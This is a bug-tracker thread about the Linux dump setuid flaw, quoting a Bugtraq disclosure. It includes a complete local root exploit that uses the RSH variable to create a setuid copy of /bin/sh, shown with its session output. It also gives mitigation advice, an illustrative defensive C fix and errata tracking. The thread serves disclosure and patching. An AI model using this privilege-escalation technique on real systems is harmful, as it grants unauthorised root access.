This is from Bugtraq. Tested, works :(

1. Problem: Linux dump command executes external program with suid privilege.
2. Tested Version dump-0.4b15
3. Example

[mat@localhost mat]$ export TAPE=garbage:garbage
[mat@localhost mat]$ export RSH=/home/mat/execute_this
[mat@localhost mat]$ cat > /home/mat/execute_this
#!/bin/sh
cp /bin/sh /home/mat/sh
chmod 4755 /home/mat/sh
[mat@localhost mat]$ chmod 755 /home/mat/execute_this
[mat@localhost mat]$ /sbin/dump -0 /
DUMP: Connection to garbage established.
DUMP: Date of this level 0 dump: Tue Oct 31 14:38:00 2000
DUMP: Date of last level 0 dump: the epoch
DUMP: Dumping /dev/hda2 (/) to garbage on host garbage
DUMP: Label: none
/dev/hda2: Permission denied while opening filesystem
[mat@localhost mat]$ ls -la /home/mat/sh
-rwsr-xr-x 1 root tty 316848 Oct 31 14:38 /home/mat/sh
[mat@localhost mat]$ /home/mat/sh
bash# id
uid=500(mat) gid=500(mat) euid=0(root) groups=500(mat)
Advice for anyone who needs a quick fix: either remove the package, if you don't need it (rpm -e dump), or remove the SUID bit from /sbin/dump *and* /sbin/restore (restore(8) lists the same RSH variable).
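The root cause reported above, handled at the code level, as an added example that is not part of the original bug thread and is not the dump project's code or its actual fix: a setuid program that must start a remote-shell helper ignores a caller-supplied RSH while it is elevated and drops privilege for good before exec. The names choose_rsh, drop_privileges and spawn_rsh and the default path /usr/bin/rsh are assumptions made for illustration.

```c
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Assumed built-in helper path (hypothetical, not taken from dump). */
static const char default_rsh[] = "/usr/bin/rsh";

/* Pick the remote-shell helper. A caller-supplied RSH is honoured only when
 * the process holds no privilege beyond the invoking user's own. */
const char *choose_rsh(const char *env_rsh, uid_t ruid, uid_t euid,
                       gid_t rgid, gid_t egid)
{
    if (ruid != euid || rgid != egid)
        return default_rsh;           /* setuid/setgid context: ignore env */
    if (env_rsh == NULL || env_rsh[0] != '/')
        return default_rsh;           /* require an absolute path */
    return env_rsh;
}

/* Permanently give up setuid-root privilege. Returns 0 on success, -1 if the
 * process is still elevated afterwards. The group goes first: once the UID is
 * dropped the process may no longer change its GID. When called with euid 0,
 * setuid() resets the real, effective and saved IDs together. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    if (setgid(rgid) != 0 || setuid(ruid) != 0)
        return -1;
    if (geteuid() != ruid || getegid() != rgid)
        return -1;
    if (ruid != 0 && setuid(0) == 0)  /* privilege must not be recoverable */
        return -1;
    return 0;
}

/* Start the helper in a child that has dropped privilege before exec. */
int spawn_rsh(const char *host)
{
    const char *rsh = choose_rsh(getenv("RSH"), getuid(), geteuid(),
                                 getgid(), getegid());
    pid_t pid = fork();
    if (pid == 0) {
        if (drop_privileges() != 0)
            _exit(126);               /* never exec while still elevated */
        execl(rsh, rsh, host, (char *)NULL);
        _exit(127);                   /* exec failed */
    }
    return pid < 0 ? -1 : 0;
}
```

Either measure alone would have stopped the session shown in the report; using both keeps the helper unprivileged even if the environment check is later loosened.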
*** Bug 20112 has been marked as a duplicate of this bug. ***
Fixed in dump-0.4b19-5.
dump-static obviously suffers from the same problem, so an errata update is needed for this package, too. Reopening.
The advisory mentions update RPMs for dump-static and rmt, but they are not on updates.redhat.com.
19:48:40 `SRPMS/dump-0.4b19-5.6x.src.rpm' size = 166647 has new time, getting
19:48:41 `i386/dump-0.4b19-5.6x.i386.rpm' size = 88538 has new time, getting
19:48:41 `i386/dump-static-0.4b19-5.6x.i386.rpm' size = 426967 is missing, getting.
19:48:41 `i386/rmt-0.4b19-5.6x.i386.rpm' size = 12550 is missing, getting.

ok, so the dump errata was re-issued, now with dump-static & rmt. Closing bug.
*** Bug 20565 has been marked as a duplicate of this bug. ***